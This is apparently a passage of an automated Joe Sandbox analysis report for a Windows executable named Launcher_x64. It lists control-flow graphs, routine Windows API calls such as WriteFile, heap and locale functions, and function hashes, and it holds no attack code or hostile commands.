                                                                                          control_flow_graph 87 d7d3a4-d7d3c6 88 d7d3cc-d7d3ce 87->88 89 d7d5b9 87->89 91 d7d3d0-d7d3ef call d71ba8 88->91 92 d7d3fa-d7d41d 88->92 90 d7d5bb-d7d5bf 89->90 100 d7d3f2-d7d3f5 91->100 94 d7d423-d7d429 92->94 95 d7d41f-d7d421 92->95 94->91 96 d7d42b-d7d43c 94->96 95->94 95->96 98 d7d44f-d7d45f call d7d6d1 96->98 99 d7d43e-d7d44c call d7c152 96->99 105 d7d461-d7d467 98->105 106 d7d4a8-d7d4ba 98->106 99->98 100->90 109 d7d490-d7d4a6 call d7d74e 105->109 110 d7d469-d7d46c 105->110 107 d7d511-d7d531 WriteFile 106->107 108 d7d4bc-d7d4c2 106->108 111 d7d533-d7d539 GetLastError 107->111 112 d7d53c 107->112 114 d7d4c4-d7d4c7 108->114 115 d7d4fd-d7d50a call d7db7d 108->115 125 d7d489-d7d48b 109->125 116 d7d477-d7d486 call d7db15 110->116 117 d7d46e-d7d471 110->117 111->112 119 d7d53f-d7d54a 112->119 120 d7d4e9-d7d4fb call d7dd41 114->120 121 d7d4c9-d7d4cc 114->121 132 d7d50f 115->132 116->125 117->116 122 d7d551-d7d554 117->122 126 d7d5b4-d7d5b7 119->126 127 d7d54c-d7d54f 119->127 137 d7d4e4-d7d4e7 120->137 128 d7d557-d7d559 121->128 129 d7d4d2-d7d4df call d7dc58 121->129 122->128 125->119 126->90 127->122 133 d7d587-d7d593 128->133 134 d7d55b-d7d560 128->134 129->137 132->137 140 d7d595-d7d59b 133->140 141 d7d59d-d7d5af 133->141 138 d7d562-d7d574 134->138 139 d7d579-d7d582 call d713a0 134->139 137->125 138->100 139->100 140->89 140->141 141->100
                                                                                          APIs
                                                                                            • Part of subcall function 00D7D74E: GetConsoleOutputCP.KERNEL32(BFBEED24,00000000,00000000,?), ref: 00D7D7B1
                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,00D6D832,?,00D6DA94), ref: 00D7D529
                                                                                          • GetLastError.KERNEL32(?,00D6D832,?,00D6DA94,?,00D6DA94,?,?,?,?,?,?,?,00000000,?,?), ref: 00D7D533
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleErrorFileLastOutputWrite
                                                                                          • String ID:
                                                                                          • API String ID: 2915228174-0
                                                                                          • Opcode ID: db1c0121cc33cb4c39119779573f171792c998934b78062a8c9da57e3abf6d25
                                                                                          • Instruction ID: 63e1d03deb2fcc0007c92993e3a7cf993b0cf7557082b7a8ee88e7f97c8bc6a4
                                                                                          • Opcode Fuzzy Hash: db1c0121cc33cb4c39119779573f171792c998934b78062a8c9da57e3abf6d25
                                                                                          • Instruction Fuzzy Hash: 1D6194B1D00119AFDF11DFA8D884AEE7BBAEF49318F188145E948A7252E371D911CB71

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 144 d7db7d-d7dbd2 call d6a050 147 d7dc47-d7dc57 call d671d1 144->147 148 d7dbd4 144->148 149 d7dbda 148->149 152 d7dbe0-d7dbe2 149->152 153 d7dbe4-d7dbe9 152->153 154 d7dbfc-d7dc21 WriteFile 152->154 155 d7dbf2-d7dbfa 153->155 156 d7dbeb-d7dbf1 153->156 157 d7dc23-d7dc2e 154->157 158 d7dc3f-d7dc45 GetLastError 154->158 155->152 155->154 156->155 157->147 159 d7dc30-d7dc3b 157->159 158->147 159->149 160 d7dc3d 159->160 160->147
                                                                                          APIs
                                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00D7D50F,?,00D6DA94,?,?,?,00000000), ref: 00D7DC19
                                                                                          • GetLastError.KERNEL32(?,00D7D50F,?,00D6DA94,?,?,?,00000000,?,?,?,?,?,00D6D832,?,00D6DA94), ref: 00D7DC3F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastWrite
                                                                                          • String ID:
                                                                                          • API String ID: 442123175-0
                                                                                          • Opcode ID: 2bdcd0344a7d4c33d102da07682fea40fc1cda4927331a900991a7b243f5fd4f
                                                                                          • Instruction ID: 36ff188b99f058f1c8bc87c02524d338974b50937d76238cf258de9c4a9dc03a
                                                                                          • Opcode Fuzzy Hash: 2bdcd0344a7d4c33d102da07682fea40fc1cda4927331a900991a7b243f5fd4f
                                                                                          • Instruction Fuzzy Hash: 61217130A002189FCB19CF19DC809E9B7FAEF48305F1480A9E94AD7251E6309D42CF71

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 161 d77192-d77197 162 d77199-d771b1 161->162 163 d771b3-d771b7 162->163 164 d771bf-d771c8 162->164 163->164 165 d771b9-d771bd 163->165 166 d771da 164->166 167 d771ca-d771cd 164->167 168 d77234-d77238 165->168 171 d771dc-d771e9 GetStdHandle 166->171 169 d771d6-d771d8 167->169 170 d771cf-d771d4 167->170 168->162 172 d7723e-d77241 168->172 169->171 170->171 173 d77216-d77228 171->173 174 d771eb-d771ed 171->174 173->168 175 d7722a-d7722d 173->175 174->173 176 d771ef-d771f8 GetFileType 174->176 175->168 176->173 177 d771fa-d77203 176->177 178 d77205-d77209 177->178 179 d7720b-d7720e 177->179 178->168 179->168 180 d77210-d77214 179->180 180->168
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00D77081,00D8FCD8,0000000C), ref: 00D771DE
                                                                                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00D77081,00D8FCD8,0000000C), ref: 00D771F0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileHandleType
                                                                                          • String ID:
                                                                                          • API String ID: 3000768030-0
                                                                                          • Opcode ID: 137cab357fcb32d3ee4ede96d72959c40c73ca4d3d0443a8aac9ab536251973f
                                                                                          • Instruction ID: c5e89f5c09aae3b6085cac6062d340093332cac684a20084acb975245ca801cd
                                                                                          • Opcode Fuzzy Hash: 137cab357fcb32d3ee4ede96d72959c40c73ca4d3d0443a8aac9ab536251973f
                                                                                          • Instruction Fuzzy Hash: 7811B4316087414AC7308E3E8C886267A95A756370B3C4F5AE8BEC65F2E630D846D775

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32 ref: 00D62038
                                                                                          • GetModuleFileNameW.KERNEL32 ref: 00D62058
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Module$FileHandleName
                                                                                          • String ID:
                                                                                          • API String ID: 4146042529-0
                                                                                          • Opcode ID: a512b74ccb9a9b36d61220deaee4743d8be649fa0a72545cca8a6baafd317195
                                                                                          • Instruction ID: 2338be8c0bb8f64ee6b86f8c036411a76367363ba6df10ebd0ede51b1ade0b89
                                                                                          • Opcode Fuzzy Hash: a512b74ccb9a9b36d61220deaee4743d8be649fa0a72545cca8a6baafd317195
                                                                                          • Instruction Fuzzy Hash: A901ECB19043089FD715EF68D54569DBBF4FF48304F4144ADE489D3341EB745A888FA2

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 188 d756b7-d756c0 189 d756c2-d756d5 RtlFreeHeap 188->189 190 d756ef-d756f0 188->190 189->190 191 d756d7-d756ee GetLastError call d7135d call d71314 189->191 191->190
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,00D79A64,?,00000000,?,?,00D79704,?,00000007,?,?,00D7A04A,?,?), ref: 00D756CD
                                                                                          • GetLastError.KERNEL32(?,?,00D79A64,?,00000000,?,?,00D79704,?,00000007,?,?,00D7A04A,?,?), ref: 00D756D8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 485612231-0
                                                                                          • Opcode ID: e9080ac15d8eec3a9a453a1541a77d463776270b40dd176e04f87891ce287262
                                                                                          • Instruction ID: 82c320681a03e2db7e753e88ac5fa7eb18bad4de3c493d51d1c75d1c1a03dbae
                                                                                          • Opcode Fuzzy Hash: e9080ac15d8eec3a9a453a1541a77d463776270b40dd176e04f87891ce287262
                                                                                          • Instruction Fuzzy Hash: 54E08C36200718ABDB112FA8FC09B8D7BA8EF40752F588025F60CC6260EB708860CBB5

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 196 d614c0-d6152f call d73330 call d63070 201 d61535-d61555 call d63070 196->201 202 d61560-d6156a 196->202 210 d6156f-d61592 call d63070 201->210 211 d6155b 201->211 204 d61597-d615be call d63090 call d631a0 202->204 214 d615c4-d615cd 204->214 215 d615d2-d6162c call d63370 call d631c0 call d633a0 call d63410 204->215 210->204 211->202 217 d618b5-d61903 call d635f0 call d63640 214->217 232 d61632 215->232 233 d616e1 215->233 234 d61637-d61643 232->234 235 d616e6-d616ef 233->235 236 d616dc 234->236 237 d61649-d616b1 call d63450 call d63520 call d63470 call d63540 call d63430 234->237 238 d61707-d6170c 235->238 239 d616f5-d61704 235->239 236->233 283 d616b7-d616d7 237->283 284 d616bc-d616c5 237->284 241 d61717-d6175c call d63450 call d63550 call d63470 238->241 242 d61712-d617c0 238->242 239->238 268 d61761-d6178d call d63540 call d63430 241->268 247 d617c6 242->247 248 d61891-d618b0 call d635a0 242->248 251 d617cb-d617d7 247->251 248->217 259 d61835-d6183c 248->259 255 d6188c 251->255 256 d617dd-d61820 call d63450 call d63520 call d63470 251->256 255->248 256->259 281 d61841-d61861 call d63540 call d63430 256->281 259->217 287 d61793 268->287 288 d61798-d6179e 268->288 293 d61867-d61887 281->293 294 d6186c-d61875 281->294 283->234 284->236 290 d617a1-d617b7 287->290 288->290 290->235 293->251 294->255
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strlen
                                                                                          • String ID:
                                                                                          • API String ID: 4218353326-0
                                                                                          • Opcode ID: a22ec2d54a8d2018ebac477069ac589123a28952c2ac0297dc7b020655c9532f
                                                                                          • Instruction ID: 5a505705c6d4bbc08fa017838bf53b7a365b0a9d5e882cc09df635a93101b7c0
                                                                                          • Opcode Fuzzy Hash: a22ec2d54a8d2018ebac477069ac589123a28952c2ac0297dc7b020655c9532f
                                                                                          • Instruction Fuzzy Hash: 83D1D278604B408FC724DF29C595A66BBE0FF48718B188A1DE8D78BBA1D735F904CB61

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 296 d68570-d68595 297 d68597-d68599 296->297 298 d6859e-d685a6 296->298 301 d68690-d6869d call d671d1 297->301 299 d685ce-d685d2 298->299 300 d685a8-d685b2 298->300 303 d6868a 299->303 304 d685d8-d685e7 call d68cd3 299->304 300->299 305 d685b4-d685c9 300->305 308 d6868f 303->308 310 d685ef-d68624 304->310 311 d685e9-d685ed 304->311 305->308 308->301 317 d68626-d68629 310->317 318 d68650-d68658 310->318 312 d68637 call d68074 311->312 315 d6863c-d6864e 312->315 315->308 317->318 321 d6862b-d6862f 317->321 319 d6866d-d68688 318->319 320 d6865a-d6866b call d72ab4 318->320 319->308 320->303 320->319 321->303 323 d68631-d68634 321->323 323->312
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1dcf436de0086affbd44e47ae47af7727ad7e372c56b4d343894799576ec9e06
                                                                                          • Instruction ID: 6ffcfa857a99488d167199c47e51f0eec4907c8134ff3d57f0347b844f8e12a6
                                                                                          • Opcode Fuzzy Hash: 1dcf436de0086affbd44e47ae47af7727ad7e372c56b4d343894799576ec9e06
                                                                                          • Instruction Fuzzy Hash: 94416071A0011AAFCF14DFA8C4509EDB7B9FF18314B584269E546E7680EB31E945EBB0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 325 d7670d-d76737 326 d7673d-d7673f 325->326 327 d76739-d7673b 325->327 329 d76745-d7674c call d76642 326->329 330 d76741-d76743 326->330 328 d7678e-d76791 327->328 332 d76751-d76755 329->332 330->328 333 d76757-d76765 GetProcAddress 332->333 334 d76774-d7678b 332->334 333->334 335 d76767-d76772 call d6d110 333->335 336 d7678d 334->336 335->336 336->328
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ca0e0c2d956c8e75facbf4b996802391ac10bb518d9f3ad1993e41f29ce97e30
                                                                                          • Instruction ID: 52d3c951007802c183f8d8946446ac32f5950d58d0868aa09570aed9ee07048c
                                                                                          • Opcode Fuzzy Hash: ca0e0c2d956c8e75facbf4b996802391ac10bb518d9f3ad1993e41f29ce97e30
                                                                                          • Instruction Fuzzy Hash: E601B937610725AF9B059F68EC8191637A6F7C17A47288115F918C7694FB30DC109BF0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 339 d756f1-d756fd 340 d7572f-d7573a call d71314 339->340 341 d756ff-d75701 339->341 348 d7573c-d7573e 340->348 342 d75703-d75704 341->342 343 d7571a-d7572b RtlAllocateHeap 341->343 342->343 345 d75706-d7570d call d71eee 343->345 346 d7572d 343->346 345->340 351 d7570f-d75718 call d6f4ab 345->351 346->348 351->340 351->343
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000000,00D77675,?,?,00D77675,00000220,?,?,?), ref: 00D75723
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: a02ba25e8dc9054a79c49bc6650220cb31249972e9e4d63b9d757ce0fd63e3df
                                                                                          • Instruction ID: 2b433325a8d56fea1582dd1478ae2161fc3257219f3613cafb71df678cf91444
                                                                                          • Opcode Fuzzy Hash: a02ba25e8dc9054a79c49bc6650220cb31249972e9e4d63b9d757ce0fd63e3df
                                                                                          • Instruction Fuzzy Hash: 29E06535200A25D6EA256A65BC01B5B3658DF817F0F19C121FC4DD6198FFD0DC0181F2
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: __floor_pentium4
                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                          • API String ID: 4168288129-2761157908
                                                                                          • Opcode ID: bd669d6215554e12e635d0c04ddcd7e7c480ab396f2fbb628715600087972ea2
                                                                                          • Instruction ID: 05e70c6f7178ebb6cfd14f0fdd44d3454c034c3da75391232b28d9d9d0087811
                                                                                          • Opcode Fuzzy Hash: bd669d6215554e12e635d0c04ddcd7e7c480ab396f2fbb628715600087972ea2
                                                                                          • Instruction Fuzzy Hash: E0D24D75E082298FDB64DF28DC407EAB7B9EB44305F1841EAD44DE7240EB74AE898F51
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,00D7AB6D,00000002,00000000,?,?,?,00D7AB6D,?,00000000), ref: 00D7B250
                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,00D7AB6D,00000002,00000000,?,?,?,00D7AB6D,?,00000000), ref: 00D7B279
                                                                                          • GetACP.KERNEL32(?,?,00D7AB6D,?,00000000), ref: 00D7B28E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 2299586839-711371036
                                                                                          • Opcode ID: 104557e406e8af8b90e8928730565bc8c50f6d6dd59493b34bc93898e2328cd0
                                                                                          • Instruction ID: ad49d30e01a4e4d86c5439c32d2d6f1389a12d6cb51c74148564451106975f2d
                                                                                          • Opcode Fuzzy Hash: 104557e406e8af8b90e8928730565bc8c50f6d6dd59493b34bc93898e2328cd0
                                                                                          • Instruction Fuzzy Hash: 1021C422A02100AADB348F54C805B9F73A7AF54B34B5AC026E80EDB216F732DD40C778
                                                                                          APIs
                                                                                            • Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
                                                                                            • Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0
                                                                                          • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00D7AB3F
                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 00D7AB7D
                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00D7AB90
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00D7ABD8
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00D7ABF3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                          • String ID:
                                                                                          • API String ID: 415426439-0
                                                                                          • Opcode ID: bf0a0a2bea6dc38dd9371567bda3d378ebbffd9b2a44813376714506e90dcd0a
                                                                                          • Instruction ID: e06a8d4d02587f620353ddd69fedfa8a7e3d78e66bc80585e358d1a7ec63fff4
                                                                                          • Opcode Fuzzy Hash: bf0a0a2bea6dc38dd9371567bda3d378ebbffd9b2a44813376714506e90dcd0a
                                                                                          • Instruction Fuzzy Hash: 3A5171B1A00219AFDB11DFA8CC45ABE73B9EF84700F088569E908E7191F770D944CB72
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
